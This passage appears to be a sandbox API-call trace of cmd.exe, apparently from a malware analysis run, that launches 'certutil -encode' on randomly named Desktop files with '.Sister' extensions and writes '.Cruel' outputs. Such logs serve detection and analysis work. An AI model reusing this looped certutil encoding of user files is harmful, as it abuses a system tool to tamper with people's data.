[0241.005] _wcsicmp (_String1="certutil", _String2="VER") returned -19 [0241.005] _wcsicmp (_String1="certutil", _String2="VOL") returned -19 [0241.007] _wcsicmp (_String1="certutil", _String2="EXIT") returned -2 [0241.007] _wcsicmp (_String1="certutil", _String2="SETLOCAL") returned -16 [0241.007] _wcsicmp (_String1="certutil", _String2="ENDLOCAL") returned -2 [0241.007] _wcsicmp (_String1="certutil", _String2="TITLE") returned -17 [0241.007] _wcsicmp (_String1="certutil", _String2="START") returned -16 [0241.007] _wcsicmp (_String1="certutil", _String2="DPATH") returned -1 [0241.007] _wcsicmp (_String1="certutil", _String2="KEYS") returned -8 [0241.007] _wcsicmp (_String1="certutil", _String2="MOVE") returned -10 [0241.007] _wcsicmp (_String1="certutil", _String2="PUSHD") returned -13 [0241.007] _wcsicmp (_String1="certutil", _String2="POPD") returned -13 [0241.007] _wcsicmp (_String1="certutil", _String2="ASSOC") returned 2 [0241.007] _wcsicmp (_String1="certutil", _String2="FTYPE") returned -3 [0241.007] _wcsicmp (_String1="certutil", _String2="BREAK") returned 1 [0241.007] _wcsicmp (_String1="certutil", _String2="COLOR") returned -10 [0241.007] _wcsicmp (_String1="certutil", _String2="MKLINK") returned -10 [0241.007] _wcsicmp (_String1="certutil", _String2="FOR") returned -3 [0241.007] _wcsicmp (_String1="certutil", _String2="IF") returned -6 [0241.007] _wcsicmp (_String1="certutil", _String2="REM") returned -15 [0241.007] ??_V@YAXPEAX@Z () returned 0x1 [0241.007] GetProcessHeap () returned 0x21ed8c70000 [0241.007] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed92f1330 [0241.008] GetProcessHeap () returned 0x21ed8c70000 [0241.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xaa) returned 0x21ed8c96d00 [0241.008] _wcsnicmp (_String1="cert", _String2="cmd ", _MaxCount=0x4) returned -8 [0241.008] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0241.008] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0241.008] GetProcessHeap () returned 0x21ed8c70000 [0241.008] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1ffac) returned 0x21ed9301320 [0241.009] SetErrorMode (uMode=0x0) returned 0x0 [0241.009] SetErrorMode (uMode=0x1) returned 0x0 [0241.009] GetFullPathNameW (in: lpFileName=".", nBufferLength=0xffce, lpBuffer=0x21ed9301330, lpFilePart=0xa6cf4fdb80 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0xa6cf4fdb80*="Desktop") returned 0x17 [0241.009] SetErrorMode (uMode=0x0) returned 0x1 [0241.009] GetProcessHeap () returned 0x21ed8c70000 [0241.009] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9301320, Size=0x52) returned 0x21ed9301320 [0241.009] GetProcessHeap () returned 0x21ed8c70000 [0241.009] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9301320) returned 0x52 [0241.010] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0241.010] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0241.010] GetProcessHeap () returned 0x21ed8c70000 [0241.010] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x1bc) returned 0x21ed8d5e990 [0241.010] GetProcessHeap () returned 0x21ed8c70000 [0241.010] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x368) returned 0x21ed8d451b0 [0241.010] GetProcessHeap () returned 0x21ed8c70000 [0241.010] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d451b0, Size=0x1be) returned 0x21ed8d451b0 [0241.010] GetProcessHeap () returned 0x21ed8c70000 [0241.010] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d451b0) returned 0x1be [0241.010] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0241.010] GetProcessHeap () returned 0x21ed8c70000 [0241.010] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xe8) returned 0x21ed8c78c40 [0241.010] GetProcessHeap () returned 0x21ed8c70000 [0241.010] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c78c40, Size=0x7e) returned 0x21ed8c78c40 [0241.010] GetProcessHeap () returned 0x21ed8c70000 [0241.010] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c78c40) returned 0x7e [0241.010] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0241.011] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0241.011] GetLastError () returned 0x2 [0241.011] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0241.011] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0241.011] GetLastError () returned 0x2 [0241.011] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0241.012] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.*", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7cbe0 [0241.012] FindClose (in: hFindFile=0x21ed8c7cbe0 | out: hFindFile=0x21ed8c7cbe0) returned 1 [0241.012] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.COM", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0xffffffffffffffff [0241.012] GetLastError () returned 0x2 [0241.012] FindFirstFileExW (in: lpFileName="C:\\WINDOWS\\system32\\certutil.EXE", fInfoLevelId=0x1, lpFindFileData=0xa6cf4fd8f0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xa6cf4fd8f0) returned 0x21ed8c7ce20 [0241.012] FindClose (in: hFindFile=0x21ed8c7ce20 | out: hFindFile=0x21ed8c7ce20) returned 1 [0241.012] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0241.012] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0241.013] ??_V@YAXPEAX@Z () returned 0x1 [0241.013] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde70, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0241.013] InitializeProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0xa6cf4fdc80 | out: lpAttributeList=0xa6cf4fdd90, lpSize=0xa6cf4fdc80) returned 1 [0241.014] UpdateProcThreadAttribute (in: lpAttributeList=0xa6cf4fdd90, dwFlags=0x0, Attribute=0x60001, lpValue=0xa6cf4fdc6c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0xa6cf4fdd90, lpPreviousValue=0x0) returned 1 [0241.014] GetStartupInfoW (in: lpStartupInfo=0xa6cf4fdd20 | out: lpStartupInfo=0xa6cf4fdd20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\WINDOWS\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0241.014] GetProcessHeap () returned 0x21ed8c70000 [0241.014] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x20) returned 0x21ed8d45da0 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="b2eincf", _MaxCount=0x7) returned 1 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0241.014] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0241.015] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0241.016] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0241.016] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0241.016] GetProcessHeap () returned 0x21ed8c70000 [0241.016] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d45da0) returned 1 [0241.016] GetProcessHeap () returned 0x21ed8c70000 [0241.016] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x12) returned 0x21ed8c95b60 [0241.016] lstrcmpW (lpString1="\\certutil.exe", lpString2="\\XCOPY.EXE") returned -1 [0241.016] _get_osfhandle (_FileHandle=1) returned 0x50 [0241.016] SetConsoleMode (hConsoleHandle=0x50, dwMode=0x3) returned 1 [0241.016] _get_osfhandle (_FileHandle=0) returned 0x4c [0241.016] SetConsoleMode (hConsoleHandle=0x4c, dwMode=0x1f7) returned 1 [0241.017] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\certutil.exe", lpCommandLine="certutil -encode \"NMgihtIW4j90xeC_.mkv.Sister\" \"NMgihtIW4j90xeC_.mkv.Cruel\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0xa6cf4fdcb0*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="certutil -encode \"NMgihtIW4j90xeC_.mkv.Sister\" \"NMgihtIW4j90xeC_.mkv.Cruel\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xa6cf4fdc88 | out: lpCommandLine="certutil -encode \"NMgihtIW4j90xeC_.mkv.Sister\" \"NMgihtIW4j90xeC_.mkv.Cruel\"", lpProcessInformation=0xa6cf4fdc88*(hProcess=0xa4, hThread=0xa8, dwProcessId=0x1208, dwThreadId=0x1020)) returned 1 [0241.027] CloseHandle (hObject=0xa8) returned 1 [0241.027] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0241.027] GetProcessHeap () returned 0x21ed8c70000 [0241.027] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8d44660) returned 1 [0241.027] GetEnvironmentStringsW () returned 0x21ed8d44660* [0241.027] GetProcessHeap () returned 0x21ed8c70000 [0241.027] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0241.027] FreeEnvironmentStringsA (penv="=") returned 1 [0241.027] WaitForSingleObject (hHandle=0xa4, dwMilliseconds=0xffffffff) returned 0x0 [0241.496] GetExitCodeProcess (in: hProcess=0xa4, lpExitCode=0xa6cf4fdc08 | out: lpExitCode=0xa6cf4fdc08*=0x0) returned 1 [0241.496] CloseHandle (hObject=0xa4) returned 1 [0241.496] _vsnwprintf (in: _Buffer=0xa6cf4fddd8, _BufferCount=0x13, _Format="%08X", _ArgList=0xa6cf4fdc18 | out: _Buffer="00000000") returned 8 [0241.496] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0241.496] GetProcessHeap () returned 0x21ed8c70000 [0241.496] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0241.496] GetEnvironmentStringsW () returned 0x21ed8d44660* [0241.496] GetProcessHeap () returned 0x21ed8c70000 [0241.496] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0241.496] FreeEnvironmentStringsA (penv="=") returned 1 [0241.497] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0241.497] GetProcessHeap () returned 0x21ed8c70000 [0241.497] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed93b0130) returned 1 [0241.497] GetEnvironmentStringsW () returned 0x21ed8d44660* [0241.497] GetProcessHeap () returned 0x21ed8c70000 [0241.497] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xb40) returned 0x21ed93b0130 [0241.497] FreeEnvironmentStringsA (penv="=") returned 1 [0241.497] GetProcessHeap () returned 0x21ed8c70000 [0241.497] RtlFreeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, BaseAddress=0x21ed8c95b60) returned 1 [0241.497] DeleteProcThreadAttributeList (in: lpAttributeList=0xa6cf4fdd90 | out: lpAttributeList=0xa6cf4fdd90) [0241.497] ??_V@YAXPEAX@Z () returned 0x1 [0241.497] FindNextFileW (in: hFindFile=0x21ed8c7cb20, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x839d0900, ftCreationTime.dwHighDateTime=0x1d5eb77, ftLastAccessTime.dwLowDateTime=0xedc064b0, ftLastAccessTime.dwHighDateTime=0x1d5e269, ftLastWriteTime.dwLowDateTime=0xedc064b0, ftLastWriteTime.dwHighDateTime=0x1d5e269, nFileSizeHigh=0x0, nFileSizeLow=0xd83f, dwReserved0=0x0, dwReserved1=0xe68ac9ea, cFileName="PUKKYc6CLfNruQwL4y5O.gif.Sister", cAlternateFileName="")) returned 1 [0241.497] GetProcessHeap () returned 0x21ed8c70000 [0241.497] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c78f20, Size=0x434) returned 0x21ed8d45380 [0241.497] GetProcessHeap () returned 0x21ed8c70000 [0241.497] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d45380) returned 0x434 [0241.497] GetProcessHeap () returned 0x21ed8c70000 [0241.497] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d697b0 [0241.497] GetProcessHeap () returned 0x21ed8c70000 [0241.497] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d697b0, Size=0x58) returned 0x21ed8d697b0 [0241.497] GetProcessHeap () returned 0x21ed8c70000 [0241.497] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d697b0) returned 0x58 [0241.497] GetProcessHeap () returned 0x21ed8c70000 [0241.497] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d69820 [0241.497] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0241.498] GetProcessHeap () returned 0x21ed8c70000 [0241.498] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x50) returned 0x21ed8c7cbe0 [0241.498] ??_V@YAXPEAX@Z () returned 0x1 [0241.498] malloc (_Size=0x1ff9c) returned 0x21ed97bfc00 [0241.498] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Users", cAlternateFileName="")) returned 0x21ed8c7d060 [0241.572] FindClose (in: hFindFile=0x21ed8c7d060 | out: hFindFile=0x21ed8c7d060) returned 1 [0241.572] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8c7cb80 [0241.573] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0241.573] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0xba855609, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0xba855609, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8c7cb80 [0241.573] FindClose (in: hFindFile=0x21ed8c7cb80 | out: hFindFile=0x21ed8c7cb80) returned 1 [0241.573] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\PUKKYc6CLfNruQwL4y5O.gif.Sister", lpFindFileData=0xa6cf4fdf20 | out: lpFindFileData=0xa6cf4fdf20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x839d0900, ftCreationTime.dwHighDateTime=0x1d5eb77, ftLastAccessTime.dwLowDateTime=0xedc064b0, ftLastAccessTime.dwHighDateTime=0x1d5e269, ftLastWriteTime.dwLowDateTime=0xedc064b0, ftLastWriteTime.dwHighDateTime=0x1d5e269, nFileSizeHigh=0x0, nFileSizeLow=0xd83f, dwReserved0=0x0, dwReserved1=0xea2a58ee, cFileName="PUKKYc6CLfNruQwL4y5O.gif.Sister", cAlternateFileName="PUKKYC~1.SIS")) returned 0x21ed8c7ca60 [0241.573] FindClose (in: hFindFile=0x21ed8c7ca60 | out: hFindFile=0x21ed8c7ca60) returned 1 [0241.573] _wcsnicmp (_String1="PUKKYC~1.SIS", _String2="PUKKYc6CLfNruQwL4y5O.gif.Sister", _MaxCount=0x1f) returned 72 [0241.573] malloc (_Size=0x1ff9c) returned 0x21ed97dfbb0 [0241.573] ??_V@YAXPEAX@Z () returned 0x21ed97dfbb0 [0241.573] GetProcessHeap () returned 0x21ed8c70000 [0241.573] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x42) returned 0x21ed8c7be90 [0241.573] ??_V@YAXPEAX@Z () returned 0x1 [0241.573] ??_V@YAXPEAX@Z () returned 0x1 [0241.573] GetProcessHeap () returned 0x21ed8c70000 [0241.573] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d69820, Size=0x270) returned 0x21ed8d69820 [0241.574] GetProcessHeap () returned 0x21ed8c70000 [0241.574] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d69820) returned 0x270 [0241.574] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0241.574] _get_osfhandle (_FileHandle=1) returned 0x50 [0241.574] GetFileType (hFile=0x50) returned 0x2 [0241.574] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0241.574] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0241.642] _get_osfhandle (_FileHandle=1) returned 0x50 [0241.642] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0241.716] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x7ff66c5cbb90, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0241.716] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0241.716] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0241.717] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0241.717] _get_osfhandle (_FileHandle=1) returned 0x50 [0241.717] GetFileType (hFile=0x50) returned 0x2 [0241.717] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0241.717] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0241.785] _get_osfhandle (_FileHandle=1) returned 0x50 [0241.785] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0241.917] _get_osfhandle (_FileHandle=1) returned 0x50 [0241.917] GetFileType (hFile=0x50) returned 0x2 [0241.917] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0241.917] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0241.986] _get_osfhandle (_FileHandle=1) returned 0x50 [0241.986] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d697c0*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x21ed8d697c0*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x8) returned 1 [0242.111] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe588 | out: _Buffer=" -encode \"PUKKYc6CLfNruQwL4y5O.gif.Sister\" \"PUKKYc6CLfNruQwL4y5O.gif.Cruel\" ") returned 76 [0242.111] _get_osfhandle (_FileHandle=1) returned 0x50 [0242.111] GetFileType (hFile=0x50) returned 0x2 [0242.111] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0242.111] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe518 | out: lpMode=0xa6cf4fe518) returned 1 [0242.180] _get_osfhandle (_FileHandle=1) returned 0x50 [0242.180] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x4c, lpNumberOfCharsWritten=0xa6cf4fe558, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe558*=0x4c) returned 1 [0242.285] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe5b8 | out: _Buffer="\r\n") returned 2 [0242.285] _get_osfhandle (_FileHandle=1) returned 0x50 [0242.285] GetFileType (hFile=0x50) returned 0x2 [0242.285] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0242.285] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe548 | out: lpMode=0xa6cf4fe548) returned 1 [0242.397] _get_osfhandle (_FileHandle=1) returned 0x50 [0242.397] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe588, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0242.476] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe300, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0242.544] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0242.544] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0242.544] malloc (_Size=0xffce) returned 0x21ed97bfc00 [0242.544] ??_V@YAXPEAX@Z () returned 0x21ed97bfc00 [0242.544] _wcsicmp (_String1="certutil", _String2="DIR") returned -1 [0242.544] _wcsicmp 